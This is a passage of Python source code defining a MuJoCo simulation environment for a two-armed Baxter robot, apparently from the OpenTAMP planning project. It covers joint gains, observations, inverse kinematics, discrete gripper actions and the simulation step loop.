BASE_VEL_XML = os.getcwd() + '/opentamp'+'/robot_info/baxter_model.xml'
# ENV_XML = os.getcwd() + '/opentamp'+'/robot_info/current_baxter_env.xml'
SPECIFIC_ENV_XML = os.getcwd() + '/opentamp'+'/local/current_baxter_{0}.xml'
MUJOCO_JOINT_ORDER = ['right_s0', 'right_s1', 'right_e0', 'right_e1', 'right_w0', 'right_w1', 'right_w2', 'right_gripper_l_finger_joint', 'right_gripper_r_finger_joint',\
'left_s0', 'left_s1', 'left_e0', 'left_e1', 'left_w0', 'left_w1', 'left_w2', 'left_gripper_l_finger_joint', 'left_gripper_r_finger_joint']
NO_CLOTH = 0
NO_FOLD = 1
ONE_FOLD = 2
TWO_FOLD = 3
WIDTH_GRASP = 4
LENGTH_GRASP = 5
TWO_GRASP = 6
HALF_WIDTH_GRASP = 7
HALF_LENGTH_GRASP = 8
TWIST_FOLD = 9
RIGHT_REACHABLE = 10
LEFT_REACHABLE = 11
IN_RIGHT_GRIPPER = 12
IN_LEFT_GRIPPER = 13
LEFT_FOLD_ON_TOP = 14
RIGHT_FOLD_ON_TOP = 15
BAXTER_GAINS = {
'left_s0': (5000., 0.01, 2.5),
'left_s1': (5000., 50., 50.),
'left_e0': (4000., 15., 1.),
'left_e1': (1500, 30, 1.),
'left_w0': (500, 10, 0.01),
'left_w1': (500, 0.1, 0.01),
'left_w2': (1000, 0.1, 0.01),
'left_gripper_l_finger_joint': (1000, 0.1, 0.01),
'left_gripper_r_finger_joint': (1000, 0.1, 0.01),
'right_s0': (5000., 0.01, 2.5),
'right_s1': (5000., 50., 50.),
'right_e0': (4000., 15., 1.),
'right_e1': (1500, 30, 1.),
'right_w0': (500, 10, 0.01),
'right_w1': (500, 0.1, 0.01),
'right_w2': (1000, 0.1, 0.01),
'right_gripper_l_finger_joint': (1000, 0.1, 0.01),
'right_gripper_r_finger_joint': (1000, 0.1, 0.01),
}
ERROR_COEFF = 1e2
OPEN_VAL = 50
CLOSE_VAL = -50
_MAX_FRONTBUFFER_SIZE = 2048
_CAM_WIDTH = 200
_CAM_HEIGHT = 150
GRASP_THRESHOLD = np.array([0.05, 0.05, 0.025]) # np.array([0.01, 0.01, 0.03])
# MJC_TIME_DELTA = 0.002
# MJC_DELTAS_PER_STEP = int(1. // MJC_TIME_DELTA)
N_CONTACT_LIMIT = 12
# START_EE = [0.6, -0.5, 0.7, 0, 0, 1, 0, 0.6, 0.5, 0.7, 0, 0, 1, 0]
# START_EE = [0.6, -0.5, 0.9, 0, 0, 1, 0, 0.6, 0.5, 0.9, 0, 0, 1, 0]
START_EE = [0.6, -0.4, 0.9, 0, 1, 0, 0, 0.6, 0.4, 0.9, 0, 1, 0, 0]
DOWN_QUAT = [0, 0, 1, 0]
ALT_DOWN_QUAT = [0, 0.535, 0.845, 0]
CTRL_MODES = ['joint_angle', 'end_effector', 'end_effector_pos', 'discrete_pos', 'discrete']
DISCRETE_DISP = 0.02 # How far to move for each discrete action choice
class BaxterMJCEnv(MJCEnv):
# metadata = {'render.modes': ['human', 'rgb_array', 'depth'], 'video.frames_per_second': 67}
# def __init__(self, mode='end_effector', obs_include=[], items=[], include_files=[], include_items=[], im_dims=(_CAM_WIDTH, _CAM_HEIGHT), sim_freq=25, timestep=0.002, max_iter=250, view=False):
# assert mode in CTRL_MODES, 'Env mode must be one of {0}'.format(CTRL_MODES)
# self.ctrl_mode = mode
# self.active = True
# self.cur_time = 0.
# self.prev_time = 0.
# self.timestep = timestep
# self.sim_freq = sim_freq
# self.use_viewer = view
# self.use_glew = 'MUJOCO_GL' not in os.environ or os.environ['MUJOCO_GL'] != 'osmesa'
# self.obs_include = obs_include
# self._joint_map_cache = {}
# self._ind_cache = {}
# self.im_wid, self.im_height = im_dims
# self.items = items
# self._item_map = {item[0]: item for item in items}
# self.include_files = include_files
# self.include_items = include_items
# self._set_obs_info(obs_include)
# self._load_model()
# self._init_control_info()
# self._max_iter = max_iter
# self._cur_iter = 0
# if view:
# self._launch_viewer(_CAM_WIDTH, _CAM_HEIGHT)
# else:
# self._viewer = None
def _init_control_info(self):
self.ctrl_data = {}
for joint in BAXTER_GAINS:
self.ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
self.ee_ctrl_data = {}
for joint in BAXTER_GAINS:
self.ee_ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
if not P.getConnectionInfo()['isConnected']:
P.connect(P.DIRECT)
self.geom = Baxter()
self.geom.setup()
self._jnt_inds = {}
for key, jnts in self.geom.jnt_names.items():
self._jnt_inds[key] = [self.physics.model.name2id(jnt, 'joint') for jnt in jnts]
# Start joints with grippers pointing downward
self.physics.data.qpos[1:8] = self._calc_ik(START_EE[:3], START_EE[3:7], 'right', False)
self.physics.data.qpos[10:17] = self._calc_ik(START_EE[7:10], START_EE[10:14], 'left', False)
self.physics.forward()
self.action_inds = {
('baxter', 'rArmPose'): np.array(list(range(7))),
('baxter', 'rGripper'): np.array([7]),
('baxter', 'lArmPose'): np.array(list(range(8, 15))),
('baxter', 'lGripper'): np.array([15]),
}
def _load_model(self):
xmlpath = SPECIFIC_ENV_XML.format(self.xmlid)
generate_xml(BASE_VEL_XML, xmlpath, self.items, self.include_files, self.include_items, timestep=self.timestep)
self.physics = Physics.from_xml_path(xmlpath)
# def _launch_viewer(self, width, height, title='Main'):
# self._matplot_view_thread = None
# if self.use_glew:
# self._renderer = renderer.NullRenderer()
# self._render_surface = None
# self._viewport = renderer.Viewport(width, height)
# self._window = gui.RenderWindow(width, height, title)
# self._viewer = viewer.Viewer(
# self._viewport, self._window.mouse, self._window.keyboard)
# self._viewer_layout = views.ViewportLayout()
# self._viewer.render()
# else:
# self._viewer = None
# self._matplot_im = None
# self._run_matplot_view()
# def _reload_viewer(self):
# if self._viewer is None or not self.use_glew: return
# if self._render_surface:
# self._render_surface.free()
# if self._renderer:
# self._renderer.release()
# self._render_surface = render.Renderer(
# max_width=_MAX_FRONTBUFFER_SIZE, max_height=_MAX_FRONTBUFFER_SIZE)
# self._renderer = renderer.OffScreenRenderer(
# self.physics.model, self._render_surface)
# self._renderer.components += self._viewer_layout
# self._viewer.initialize(
# self.physics, self._renderer, touchpad=False)
# self._viewer.zoom_to_scene()
# def _render_viewer(self, pixels):
# if self.use_glew:
# with self._window._context.make_current() as ctx:
# ctx.call(
# self._window._update_gui_on_render_thread, self._window._context.window, pixels)
# self._window._mouse.process_events()
# self._window._keyboard.process_events()
# else:
# if self._matplot_im is not None:
# self._matplot_im.set_data(pixels)
# plt.draw()
# def _run_matplot_view(self):
# self._matplot_view_thread = Thread(target=self._launch_matplot_view)
# self._matplot_view_thread.daemon = True
# self._matplot_view_thread.start()
# def _launch_matplot_view(self):
# try:
# self._matplot_im = plt.imshow(self.render(view=False))
# plt.show()
# except TclError:
# print('\nCould not find display to launch viewer (this does not affect the ability to render images)\n')
def _set_obs_info(self, obs_include):
self._obs_inds = {}
self._obs_shape = {}
ind = 0
if 'overhead_image' in obs_include or not len(obs_include):
self._obs_inds['overhead_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['overhead_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'forward_image' in obs_include or not len(obs_include):
self._obs_inds['forward_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['forward_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'right_image' in obs_include or not len(obs_include):
self._obs_inds['right_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['right_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'left_image' in obs_include or not len(obs_include):
self._obs_inds['left_image'] = (ind, ind+3*self.im_wid*self.im_height)
self._obs_shape['left_image'] = (self.im_height, self.im_wid, 3)
ind += 3*self.im_wid*self.im_height
if 'joints' in obs_include or not len(obs_include):
self._obs_inds['joints'] = (ind, ind+18)
self._obs_shape['joints'] = (18,)
ind += 18
if 'end_effector' in obs_include or not len(obs_include):
self._obs_inds['end_effector'] = (ind, ind+16)
self._obs_shape['end_effector'] = (16,)
ind += 16
for item, xml, info in self.items:
if item in obs_include or not len(obs_include):
self._obs_inds[item] = (ind, ind+3) # Only store 3d Position
self._obs_shape[item] = (3,)
ind += 3
self.dO = ind
self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=(ind,), dtype='float32')
return ind
def get_obs(self, obs_include=None, view=False):
obs = np.zeros(self.dO)
if obs_include is None:
obs_include = self.obs_include
if self.load_render:
if not len(obs_include) or 'overhead_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=0, view=view)
view = False
inds = self._obs_inds['overhead_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'forward_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=1, view=view)
view = False
inds = self._obs_inds['forward_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'right_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=2, view=view)
view = False
inds = self._obs_inds['right_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'left_image' in obs_include:
pixels = self.render(height=self.im_height, width=self.im_wid, camera_id=3, view=view)
view = False
inds = self._obs_inds['left_image']
obs[inds[0]:inds[1]] = pixels.flatten()
if not len(obs_include) or 'joints' in obs_include:
jnts = self.get_joint_angles()
inds = self._obs_inds['joints']
obs[inds[0]:inds[1]] = jnts
if not len(obs_include) or 'end_effector' in obs_include:
grip_jnts = self.get_gripper_joint_angles()
inds = self._obs_inds['end_effector']
obs[inds[0]:inds[1]] = np.r_[self.get_right_ee_pos(),
self.get_right_ee_rot(),
grip_jnts[0],
self.get_left_ee_pos(),
self.get_left_ee_rot(),
grip_jnts[1]]
for item in self.items:
if not len(obs_include) or item[0] in obs_include:
inds = self._obs_inds[item[0]]
obs[inds[0]:inds[1]] = self.get_item_pos(item[0])
return np.array(obs)
# def get_obs_types(self):
# return self._obs_inds.keys()
# def get_obs_inds(self, obs_type):
# if obs_type not in self._obs_inds:
# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return self._obs_inds[obs_type]
# def get_obs_shape(self, obs_type):
# if obs_type not in self._obs_inds:
# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return self._obs_shape[obs_type]
# def get_obs_data(self, obs, obs_type):
# if obs_type not in self._obs_inds:
# raise KeyError('{0} is not a valid observation for this environment. Valid options: {1}'.format(obs_type, self.get_obs_types()))
# return obs[self._obs_inds[obs_type]].reshape(self._obs_shape[obs_type])
def get_arm_section_inds(self, section_name):
inds = self.get_obs_inds('joints')
if section_name == 'lArmPose':
return inds[9:16]
if section_name == 'lGripper':
return inds[16:]
if section_name == 'rArmPose':
return inds[:7]
if section_name == 'rGripper':
return inds[7:8]
def get_left_ee_pos(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('left_gripper', 'body')
pos = self.physics.data.xpos[ind].copy()
if not mujoco_frame:
pos[2] -= MUJOCO_MODEL_Z_OFFSET
pos[0] -= MUJOCO_MODEL_X_OFFSET
return pos
def get_right_ee_pos(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('right_gripper', 'body')
pos = self.physics.data.xpos[ind].copy()
if not mujoco_frame:
pos[2] -= MUJOCO_MODEL_Z_OFFSET
pos[0] -= MUJOCO_MODEL_X_OFFSET
return pos
def get_left_ee_rot(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('left_gripper', 'body')
quat = self.physics.data.xquat[ind].copy()
return quat
def get_right_ee_rot(self, mujoco_frame=True):
model = self.physics.model
ind = model.name2id('right_gripper', 'body')
quat = self.physics.data.xquat[ind].copy()
return quat
def get_item_pos(self, name, mujoco_frame=True, rot=False):
if name.find('ee_pos') >= 0:
if name.find('left') >= 0:
return self.get_left_ee_pos(mujoco_frame)
elif name.find('right') >= 0:
return self.get_right_ee_pos(mujoco_frame)
if name.find('ee_quat') >= 0:
if name.find('left') >= 0:
return self.get_left_ee_rot(mujoco_frame)
elif name.find('right') >= 0:
return self.get_right_ee_rot(mujoco_frame)
return super(BaxterMJCEnv, self).get_item_pos(name, mujoco_frame, rot)
def get_item_rot(self, name, mujoco_frame=True, to_euler=False):
if name.find('ee_quat') >= 0:
if name.find('left') >= 0:
rpt = self.get_left_ee_rot(mujoco_frame)
elif name.find('right') >= 0:
rot = self.get_right_ee_rot(mujoco_frame)
if to_euler: rot = T.quaternion_to_euler(rot, order='xyzw')
return rot
return super(BaxterMJCEnv, self).get_item_rot(name, mujoco_frame, to_euler)
#def get_item_pos(self, name, mujoco_frame=True):
# model = self.physics.model
# try:
# ind = model.name2id(name, 'joint')
# adr = model.jnt_qposadr[ind]
# pos = self.physics.data.qpos[adr:adr+3].copy()
# except Exception as e:
# try:
# item_ind = model.name2id(name, 'body')
# pos = self.physics.data.xpos[item_ind].copy()
# except:
# item_ind = -1
# if not mujoco_frame:
# pos[2] -= MUJOCO_MODEL_Z_OFFSET
# pos[0] -= MUJOCO_MODEL_X_OFFSET
# return pos
#def set_item_pos(self, name, pos, mujoco_frame=True, forward=True):
# if not mujoco_frame:
# pos = [pos[0]+MUJOCO_MODEL_X_OFFSET, pos[1], pos[2]+MUJOCO_MODEL_Z_OFFSET]
# item_type = 'joint'
# try:
# ind = self.physics.model.name2id(name, 'joint')
# adr = self.physics.model.jnt_qposadr[ind]
# old_pos = self.physics.data.qpos[adr:adr+3]
# self.physics.data.qpos[adr:adr+3] = pos
# except Exception as e:
# try:
# ind = self.physics.model.name2id(name, 'body')
# old_pos = self.physics.data.xpos[ind]
# self.physics.data.xpos[ind] = pos
# # self.physics.model.body_pos[ind] = pos
# # old_pos = self.physics.model.body_pos[ind]
# item_type = 'body'
# except:
# item_type = 'unknown'
# if forward:
# self.physics.forward()
# # try:
# # self.physics.forward()
# # except PhysicsError as e:
# # print e
# # traceback.print_exception(*sys.exc_info())
# # print '\n\n\n\nERROR IN SETTING {0} POSE.\nPOSE TYPE: {1}.\nRESETTING SIMULATION.\n\n\n\n'.format(name, item_type)
# # qpos = self.physics.data.qpos.copy()
# # xpos = self.physics.data.xpos.copy()
# # if item_type == 'joint':
# # qpos[adr:adr+3] = old_pos
# # elif item_type == 'body':
# # xpos[ind] = old_pos
# # self.physics.reset()
# # self.physics.data.qpos[:] = qpos[:]
# # self.physics.data.xpos[:] = xpos[:]
# # self.physics.forward()
## def get_pos_from_label(self, label, mujoco_frame=True):
## if label in self._item_map:
## return self.get_item_pos(label, mujoco_frame)
## return None
def get_joint_angles(self):
return self.physics.data.qpos[1:19].copy()
def get_arm_joint_angles(self):
inds = [1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16]
return self.physics.data.qpos[inds].copy()
def set_arm_joint_angles(self, jnts):
inds = [1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16]
self.physics.data.qpos[inds] = jnts
self.physics.data.qvel[inds] = 0
self.physics.data.qacc[inds] = 0
self.physics.forward()
def set_gripper_joint_angles(self, jnts):
inds = [8, 17]
self.physics.data.qpos[inds] = jnts
self.physics.data.qvel[inds] = 0
self.physics.data.qacc[inds] = 0
self.physics.forward()
def get_gripper_joint_angles(self):
inds = [8, 17]
return self.physics.data.qpos[inds]
def _get_joints(self, act_index):
if act_index in self._joint_map_cache:
return self._joint_map_cache[act_index]
res = []
for name, attr in self.action_inds:
inds = self.action_inds[name, attr]
# Actions have a single gripper command, but MUJOCO uses two gripper joints
if act_index in inds:
if attr == 'lGripper':
res = [('left_gripper_l_finger_joint', 1), ('left_gripper_r_finger_joint', -1)]
elif attr == 'rGripper':
res = [('right_gripper_r_finger_joint', 1), ('right_gripper_l_finger_joint', -1)]
elif attr == 'lArmPose':
arm_ind = inds.tolist().index(act_index)
res = [(MUJOCO_JOINT_ORDER[9+arm_ind], 1)]
elif attr == 'rArmPose':
arm_ind = inds.tolist().index(act_index)
res = [(MUJOCO_JOINT_ORDER[arm_ind], 1)]
self._joint_map_cache[act_index] = res
return res
def get_action_meanings(self):
# For discrete action mode
return ['NOOP', 'RIGHT_EE_FORWARD', 'RIGHT_EE_BACK', 'RIGHT_EE_LEFT', 'RIGHT_EE_RIGHT',
'RIGHT_EE_UP', 'RIGHT_EE_DOWN', 'RIGHT_EE_OPEN', 'RIGHT_EE_CLOSE',
'LEFT_EE_FORWARD', 'LEFT_EE_BACK', 'LEFT_EE_LEFT', 'LEFT_EE_RIGHT',
'LEFT_EE_UP', 'LEFT_EE_DOWN', 'LEFT_EE_OPEN', 'LEFT_EE_CLOSE']
def move_right_gripper_forward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[0] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_backward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[0] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_left(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[1] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_right(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[1] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_up(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[2] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_right_gripper_down(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[2] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def open_right_gripper(self):
act = np.zeros(8)
act[3] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def close_right_gripper(self):
act = np.zeros(8)
act[3] = 0
return self.step(act, mode='end_effector_pos')
def move_left_gripper_forward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[4] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_backward(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[4] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_left(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[5] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_right(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[5] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_up(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[6] = DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def move_left_gripper_down(self):
grip_jnts = self.get_gripper_joint_angles()
act = np.zeros(8)
act[3] = grip_jnts[0]
act[7] = grip_jnts[1]
act[6] = -DISCRETE_DISP
return self.step(act, mode='end_effector_pos')
def open_left_gripper(self):
act = np.zeros(8)
act[7] = 0.02
return self.step(act, mode='end_effector_pos')
def close_left_gripper(self):
act = np.zeros(8)
act[7] = 0
return self.step(act, mode='end_effector_pos')
def _step_joint(self, joint, error):
ctrl_data = self.ctrl_data[joint]
gains = BAXTER_GAINS[joint]
dt = MJC_TIME_DELTA
de = error - ctrl_data['prev_err']
ctrl_data['cp'] = error
ctrl_data['cd'] = de / dt
ctrl_data['ci'] += error * dt
ctrl_data['prev_err'] = error
return gains[0] * ctrl_data['cp'] + \
gains[1] * ctrl_data['cd'] + \
gains[2] * ctrl_data['ci']
def _clip_joint_angles(self, r_jnts, r_grip, l_jnts, l_grip):
DOF_limits = self._ikbody.env_body.GetDOFLimits()
left_DOF_limits = (DOF_limits[0][2:9]+0.001, DOF_limits[1][2:9]-0.001)
right_DOF_limits = (DOF_limits[0][10:17]+0.001, DOF_limits[1][10:17]-0.001)
if r_grip[0] < 0:
r_grip[0] = 0
if r_grip[0] > 0.02:
r_grip[0] = 0.02
if l_grip[0] < 0:
l_grip[0] = 0
if l_grip[0] > 0.02:
l_grip[0] = 0.02
for i in range(7):
if l_jnts[i] < left_DOF_limits[0][i]:
l_jnts[i] = left_DOF_limits[0][i]
if l_jnts[i] > left_DOF_limits[1][i]:
l_jnts[i] = left_DOF_limits[1][i]
if r_jnts[i] < right_DOF_limits[0][i]:
r_jnts[i] = right_DOF_limits[0][i]
if r_jnts[i] > right_DOF_limits[1][i]:
r_jnts[i] = right_DOF_limits[1][i]
def _calc_ik(self, pos, quat, arm, check_limits=True):
lb, ub = self.geom.get_arm_bnds()
ranges = (np.array(ub) - np.array(lb)).tolist()
jnt_ids = sorted(self.geom.get_free_inds())
jnts = P.getJointStates(self.geom.id, jnt_ids)
rest_poses = []
arm_inds = self.geom.get_arm_inds(arm)
arm_jnts = self.geom.jnt_names[arm]
cur_jnts = self.get_joints(arm_jnts, vec=True)
for ind, jnt_id in enumerate(jnt_ids):
if jnt_id in arm_inds:
rest_poses.append(cur_jnts[arm_inds.index(jnt_id)])
else:
rest_poses.append(jnts[ind][0])
manip_id = self.geom.get_ee_link(arm)
damp = (0.1 * np.ones(len(jnt_ids))).tolist()
joint_pos = P.calculateInverseKinematics(self.geom.id,
manip_id,
pos,
quat,
lowerLimits=lb,
upperLimits=ub,
jointRanges=ranges,
restPoses=rest_poses,
jointDamping=damp,
maxNumIterations=128)
inds = list(self.geom.get_free_inds(arm))
joint_pos = np.array(joint_pos)[inds].tolist()
return joint_pos
#def _calc_ik(self, pos, quat, use_right=True, check_limits=True):
# arm_jnts = self.get_arm_joint_angles()
# grip_jnts = self.get_gripper_joint_angles()
# cmd = {'dpos': pos+np.array([0,0,MUJOCO_MODEL_Z_OFFSET]), 'rotation': [quat[1], quat[2], quat[3], quat[0]]}
# jnt_cmd = self._ikcontrol.joint_positions_for_eef_command(cmd, use_right)
# if use_right:
# if jnt_cmd is None:
# print('Cannot complete action; ik will cause unstable control')
# return arm_jnts[:7]
# else:
# if jnt_cmd is None:
# print('Cannot complete action; ik will cause unstable control')
# return arm_jnts[7:]
# return jnt_cmd
#def _check_ik(self, pos, quat=DOWN_QUAT, use_right=True):
# cmd = {'dpos': pos+np.array([0,0,MUJOCO_MODEL_Z_OFFSET]), 'rotation': [quat[1], quat[2], quat[3], quat[0]]}
# jnt_cmd = self._ikcontrol.joint_positions_for_eef_command(cmd, use_right)
# return jnt_cmd is not None
def step(self, action, mode=None, obs_include=None, gen_obs=True, view=False, debug=False):
start_t = time.time()
if mode is None:
mode = self.ctrl_mode
cmd = np.zeros((18))
abs_cmd = np.zeros((18))
r_grip = 0
l_grip = 0
cur_left, cur_right = self.get_attr('baxter', 'left'), self.get_attr('baxter', 'right')
if mode == 'joint_angle':
if type(action) is dict:
left = cur_left + action.get('left', np.zeros(7))
right = cur_right + action.get('right', np.zeros(7))
r_grip = action.get('right_gripper', 0)
l_grip = action.get('left_gripper', 0)
abs_cmd[:7] = right
abs_cmd[9:16] = left
else:
for i in range(len(action)):
jnts = self._get_joints(i)
for jnt in jnts:
cmd_angle = jnt[1] * action[i]
ind = MUJOCO_JOINT_ORDER.index(jnt[0])
abs_cmd[ind] = cmd_angle
r_grip = action[7]
l_grip = action[15]
elif mode == 'end_effector':
# Action Order: ee_right_pos, ee_right_quat, ee_right_grip, ee_left_pos, ee_left_quat, ee_left_grip
cur_right_ee_pos = self.get_right_ee_pos()
cur_right_ee_rot = self.get_right_ee_rot()
cur_left_ee_pos = self.get_left_ee_pos()
cur_left_ee_rot = self.get_left_ee_rot()
if type(action) is dict:
right_ee_cmd, left_ee_cmd = action['right_ee_pos'], action['left_ee_pos']
right_ee_rot, left_ee_rot = action['right_ee_rot'], action['left_ee_rot']
r_grip, l_grip = action['right_gripper'], action['left_gripper']
else:
right_ee_cmd, left_ee_cmd = action[:3], action[8:11]
right_ee_rot, left_ee_rot = action[3:7], action[11:15]
r_grip, l_grip = action[7], action[11]
target_right_ee_pos = cur_right_ee_pos + right_ee_cmd
target_right_ee_rot = right_ee_rot # cur_right_ee_rot + action[3:7]
target_left_ee_pos = cur_left_ee_pos + left_ee_cmd
target_left_ee_rot = left_ee_rot # cur_left_ee_rot + action[11:15]
# target_right_ee_rot /= np.linalg.norm(target_right_ee_rot)
# target_left_ee_rot /= np.linalg.norm(target_left_ee_rot)
right_cmd = self._calc_ik(target_right_ee_pos,
target_right_ee_rot,
'right')
left_cmd = self._calc_ik(target_left_ee_pos,
target_left_ee_rot,
'left')
abs_cmd[:7] = right_cmd
abs_cmd[9:16] = left_cmd
r_grip = action[7]
l_grip = action[15]
elif mode == 'end_effector_pos':
# Action Order: ee_right_pos, ee_right_quat, ee_right_grip, ee_left_pos, ee_left_quat, ee_left_grip
cur_right_ee_pos = self.get_right_ee_pos()
cur_left_ee_pos = self.get_left_ee_pos()
if type(action) is dict:
right_ee_cmd, left_ee_cmd = action.get('right_ee_pos', (0,0,0)), action.get('left_ee_pos', (0,0,0))
r_grip, l_grip = action.get('right_gripper', 0), action.get('left_gripper', 0)
else:
right_ee_cmd, left_ee_cmd = action[:3], action[4:7]
r_grip, l_grip = action[3], action[7]
target_right_ee_pos = cur_right_ee_pos + right_ee_cmd
target_right_ee_rot = START_EE[3:7]
target_left_ee_pos = cur_left_ee_pos + left_ee_cmd
target_left_ee_rot = START_EE[10:14]
right_cmd = self._calc_ik(target_right_ee_pos,
target_right_ee_rot,
'right')
left_cmd = self._calc_ik(target_left_ee_pos,
target_left_ee_rot,
'left')
abs_cmd[:7] = right_cmd
abs_cmd[9:16] = left_cmd
elif mode == 'discrete_pos':
if action == 1: return self.move_right_gripper_forward()
if action == 2: return self.move_right_gripper_backward()
if action == 3: return self.move_right_gripper_left()
if action == 4: return self.move_right_gripper_right()
if action == 5: return self.move_right_gripper_up()
if action == 6: return self.move_right_gripper_down()
if action == 7: return self.open_right_gripper()
if action == 8: return self.close_right_gripper()
if action == 9: return self.move_left_gripper_forward()
if action == 10: return self.move_left_gripper_backward()
if action == 11: return self.move_left_gripper_left()
if action == 12: return self.move_left_gripper_right()
if action == 13: return self.move_left_gripper_up()
if action == 14: return self.move_left_gripper_down()
if action == 15: return self.open_left_gripper()
if action == 16: return self.close_left_gripper()
return self.get_obs(view=view), \
self.compute_reward(), \
False, \
{}
for t in range(self.sim_freq): # range(int(1/(4*self.timestep))):
error = abs_cmd - self.physics.data.qpos[1:19]
cmd = ERROR_COEFF * error
# cmd[cmd > 0.25] = 0.25
# cmd[cmd < -0.25] = -0.25
cmd[7] = OPEN_VAL if r_grip > 0.0165 else CLOSE_VAL
cmd[8] = cmd[7]
cmd[16] = OPEN_VAL if l_grip > 0.0165 else CLOSE_VAL
cmd[17] = cmd[16]
# cmd[7] = 0.03 if r_grip > 0.0165 else -0.01
# cmd[8] = -cmd[7]
# cmd[16] = 0.03 if l_grip > 0.0165 else -0.01
# cmd[17] = -cmd[16]
cur_state = self.physics.data.qpos.copy()
self.physics.set_control(cmd)
try:
self.physics.step()
except PhysicsError as e:
traceback.print_exception(*sys.exc_info())
print('\n\nERROR IN PHYSICS SIMULATION; RESETTING ENV.\n\n')
self.physics.reset()
self.physics.data.qpos[:] = cur_state[:]
self.physics.forward()
# self.render(camera_id=1, view=True)
if not gen_obs and not view: return
return self.get_obs(obs_include=obs_include, view=view), \
self.compute_reward(), \
self.is_done(), \
{}
# def compute_reward(self):
# return 0
# def is_done(self):
# return self._cur_iter >= self._max_iter
# def render(self, mode='rgb_array', height=0, width=0, camera_id=0,
# overlays=(), depth=False, scene_option=None, view=True):
# # Make friendly with dm_control or gym interface
# depth = depth or mode == 'depth_array'
# view = view or mode == 'human'
# if height == 0: height = self.im_height
# if width == 0: width = self.im_wid
# pixels = self.physics.render(height, width, camera_id, overlays, depth, scene_option)
# if view and self.use_viewer:
# self._render_viewer(pixels)
# return pixels
def reset(self):
# self._cur_iter = 0
# self.physics.reset()
# self._reload_viewer()
# self.ctrl_data = {}
# self.cur_time = 0.
# self.prev_time = 0.
self._cur_iter = 0
self.physics.data.qpos[1:8] = self._calc_ik(START_EE[:3], START_EE[3:7], 'right', False)
self.physics.data.qpos[10:17] = self._calc_ik(START_EE[7:10], START_EE[10:14], 'left', False)
obs = super(BaxterMJCEnv, self).reset()
for joint in BAXTER_GAINS:
self.ctrl_data[joint] = {
'prev_err': 0.,
'cp': 0.,
'cd': 0.,
'ci': 0.,
}
return obs
@classmethod
def init_from_plan(cls, plan, view=True):
items = []
for p in list(plan.params.values()):
if p.is_symbol(): continue
param_xml = get_param_xml(p)
if param_xml is not None:
items.append(param_xml)
return cls.__init__(view, items)
def sim_from_plan(self, plan, t):
model = self.physics.model
xpos = model.body_pos.copy()
xquat = model.body_quat.copy()
param = list(plan.params.values())
for param_name in plan.params:
param = plan.params[param_name]
if param.is_symbol(): continue
if param._type != 'Robot':
if param.name in self._ind_cache:
param_ind = self._ind_cache[param.name]
else:
try:
param_ind = model.name2id(param.name, 'body')
except:
param_ind = -1
